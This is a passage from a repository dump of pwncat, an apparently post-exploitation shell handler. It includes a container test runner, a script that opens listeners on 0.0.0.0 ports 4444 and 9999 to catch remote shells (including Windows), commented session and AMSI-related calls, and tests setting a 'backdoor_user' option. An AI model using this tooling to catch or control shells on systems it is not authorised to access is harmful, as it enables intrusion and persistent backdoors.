13 | CENTOS_BIND_PORT=$(podman inspect "$CENTOS_CONTAINER" | jq -r '.[0].HostConfig.PortBindings["4444/tcp"][0].HostPort')
14 | UBUNTU_BIND_PORT=$(podman inspect "$UBUNTU_CONTAINER" | jq -r '.[0].HostConfig.PortBindings["4444/tcp"][0].HostPort')
15 |
16 | echo "[+] centos bind port: $CENTOS_BIND_PORT"
17 | echo "[+] ubuntu bind port: $UBUNTU_BIND_PORT"
18 |
19 | CENTOS_HOST="127.0.0.1" CENTOS_BIND_PORT=$CENTOS_BIND_PORT UBUNTU_HOST="127.0.0.1" UBUNTU_BIND_PORT=$UBUNTU_BIND_PORT \
20 | pytest $@
21 |
22 | podman container kill "$CENTOS_CONTAINER"""
23 | echo "[+] killed centos container"
24 | podman container kill "$UBUNTU_CONTAINER"
25 | echo "[+] killed ubuntu container"
26 |
--------------------------------------------------------------------------------
/test.py:
--------------------------------------------------------------------------------
1 | #!./env/bin/python
2 | import json
3 | import stat
4 | import time
5 | import shutil
6 | import subprocess
7 |
8 | import pwncat.manager
9 | import pwncat.platform.windows
10 |
11 | # Create a manager
12 | with pwncat.manager.Manager("data/pwncatrc") as manager:
13 |
14 | # Tell the manager to create verbose sessions that
15 | # log all commands executed on the remote host
16 | # manager.config.set("verbose", True, glob=True)
17 |
18 | # Establish a session
19 | # session = manager.create_session("windows", host="192.168.56.10", port=4444)
20 | # session = manager.create_session("windows", host="192.168.122.11", port=4444)
21 | # session = manager.create_session("linux", host="pwncat-ubuntu", port=4444)
22 | # session = manager.create_session("linux", host="127.0.0.1", port=4444)
23 | # session = manager.create_session(
24 | # "linux", certfile="/tmp/cert.pem", keyfile="/tmp/cert.pem", port=4444
25 | # )
26 |
27 | # session.platform.powershell("amsiutils")
28 |
29 | listener = manager.create_listener(
30 | protocol="socket", host="0.0.0.0", port=4444, platform="windows"
31 | )
32 | listener = manager.create_listener(protocol="socket", host="0.0.0.0", port=9999)
33 |
34 | manager.interactive()
35 |
--------------------------------------------------------------------------------
/tests/test_fileio.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | from pwncat.util import random_string
4 |
5 |
6 | def do_file_test(session, content):
7 | """Do a generic file test"""
8 |
9 | name = random_string() + ".txt"
10 | mode = "b" if isinstance(content, bytes) else ""
11 |
12 | with session.platform.open(name, mode + "w") as filp:
13 | assert filp.write(content) == len(content)
14 |
15 | with session.platform.open(name, mode + "r") as filp:
16 | assert filp.read() == content
17 |
18 | # In some cases, the act of reading/writing causes a shell to hang
19 | # so double check that.
20 | assert len(list(session.platform.Path("/").iterdir())) > 0
21 |
22 |
23 | def test_small_text(session):
24 | """Test writing a small text-only file"""
25 |
26 | do_file_test(session, "hello world")
27 |
28 |
29 | def test_large_text(session):
30 | """Test writing and reading a large text file"""
31 |
32 | contents = ("A" * 1000 + "\n") * 10
33 | do_file_test(session, contents)
34 |
35 |
36 | def test_small_binary(session):
37 | """Test writing a small amount of binary data"""
38 |
39 | contents = bytes(list(range(32)))
40 | do_file_test(session, contents)
41 |
42 |
43 | def test_large_binary(session):
44 |
45 | contents = bytes(list(range(32))) * 400
46 | do_file_test(session, contents)
47 |
--------------------------------------------------------------------------------
/tests/test_manager.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import io
3 |
4 | import pwncat.manager
5 |
6 |
7 | def test_config_fileobj():
8 |
9 | configuration = io.StringIO(
10 | """
11 | set -g db "memory://"
12 | set -g prefix c-k
13 | set -g on_load { }
14 | set -g backdoor_user "config_test"
15 | """
16 | )
17 |
18 | with pwncat.manager.Manager(config=configuration) as manager:
19 | assert manager.config["backdoor_user"] == "config_test"
20 |
21 |
22 | def test_user_config(tmp_path):
23 |
24 | import os
25 |
26 | # Ensure we don't muck up the environment for this process
27 | old_home = os.environ.get("XDG_DATA_HOME", None)
28 |
29 | try:
30 | # Set the data home to our temp path
31 | os.environ["XDG_DATA_HOME"] = str(tmp_path)
32 |
33 | # Create the pwncat directory
34 | (tmp_path / "pwncat").mkdir(exist_ok=True, parents=True)
35 |
36 | # Create our user configuration
37 | with (tmp_path / "pwncat" / "pwncatrc").open("w") as filp:
38 | filp.writelines(["""set -g backdoor_user "config_test"\n"""])
39 |
40 | os.chdir(tmp_path)
41 |
42 | # Create a manager object with default config to load our
43 | # user configuration.
44 | with pwncat.manager.Manager(config=None) as manager:
45 | assert manager.config["backdoor_user"] == "config_test"
46 | finally:
47 | # Restore the environment
48 | if old_home is not None:
49 | os.environ["XDG_DATA_HOME"] = old_home
50 | else:
51 | del os.environ["XDG_DATA_HOME"]
52 |
--------------------------------------------------------------------------------
/tests/test_test.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import io
3 |
4 | import pytest
5 | import paramiko
6 |
--------------------------------------------------------------------------------